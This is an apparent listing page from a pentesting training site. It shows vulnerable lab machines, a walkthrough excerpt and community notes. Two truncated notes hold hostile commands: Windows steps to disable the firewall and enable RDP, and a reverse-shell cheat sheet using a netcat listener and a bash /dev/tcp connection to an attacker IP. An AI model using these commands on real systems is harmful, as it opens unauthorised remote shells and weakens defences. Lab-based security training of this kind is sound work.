Latest vulnerable machines- MrLeet


MrLeet provides vulnerables machines allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
Machine: DC-6
By: dcau 2019-05-18 11:12:55

MrLeet

Machine Details: DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginn...

Machine Size: 618
Machine OS: linux
Machine Level: intermediate


Score: 0

Machine: DC-5
By: dcau 2019-05-18 11:12:59

MrLeet

Machine Details: DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for...

Machine Size: 521
Machine OS: linux
Machine Level: intermediate


Score: 0

Machine: DC-4
By: dcau 2019-05-18 11:13:03

MrLeet

Machine Details: DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Unlike the previous DC releases, this one is designed primarily for beginne...

Machine Size: 617
Machine OS: linux
Machine Level: intermediate


Score: 0

Latest walkthrough of machines- MrLeet


MrLeet provides walkthrough of vulnerable machines allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
Walkthrough of: Matrix_1
By: unknowndevice64 2019-05-17 12:40:46

MrLeet

Discovery
First, we need to recognize the IP that the machine is using, I use arp-scan for the job but you can use netdiscover or nmap to do the trick, with arp-scan is like this:

arp-scan -l
This puts out a list of all the machines in the network that a re sending ARP packets, the output looks like this:

The IP of the machine identified
With that, we can proceed to do some footprinting u...


Score: 0

Latest notes for PenTesting- MrLeet


MrLeet provides useful notes from different hackers allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.
By: ajayverma 2019-05-23 17:21:58

1- /bin : Contains all binary executable programs required for booting and repairing of the system. It also contains commands required to run into single-user-mode and other basic commands like ps, ls, ping, grep, cp, less.
2- /boot : Boot loader files including Linux Kernel and grub files.
3- /dev : Contains all device files required for the har...


Score: 0


Basic Information

systeminfo
set
hostname
net users
net user user1
net localgroups

# Set path:
set PATH=%PATH%;C:\xampp

Firewall
netsh firewall show state
netsh firewall show config

# Turn firewall off
netsh firewall set opmode disable

# allow RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Se...


Score: 1


First of all, on your machine, set up a listener, where attackerip is your IP address and 4444 is an arbitrary TCP port unfiltered by the target's firewall:
attacker$ nc -l -v attackerip 4444
Bash
Alternatives for Bash shell:
exec /bin/bash 0&0 2>&0
Or:
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <...


Score: 1

Latest picturess useful in PenTesting- MrLeet


MrLeet provides useful pictures from different hackers useful in digital security, computer applications and network administration tasks.
By: ajayverma 2019-05-23 17:19:40





Score: 0

By: ajayverma 2019-05-23 17:13:56





Score: 0

By: ajayverma 2019-05-23 17:05:23





Score: 0

By: ajayverma 2019-05-23 15:53:01





Score: 0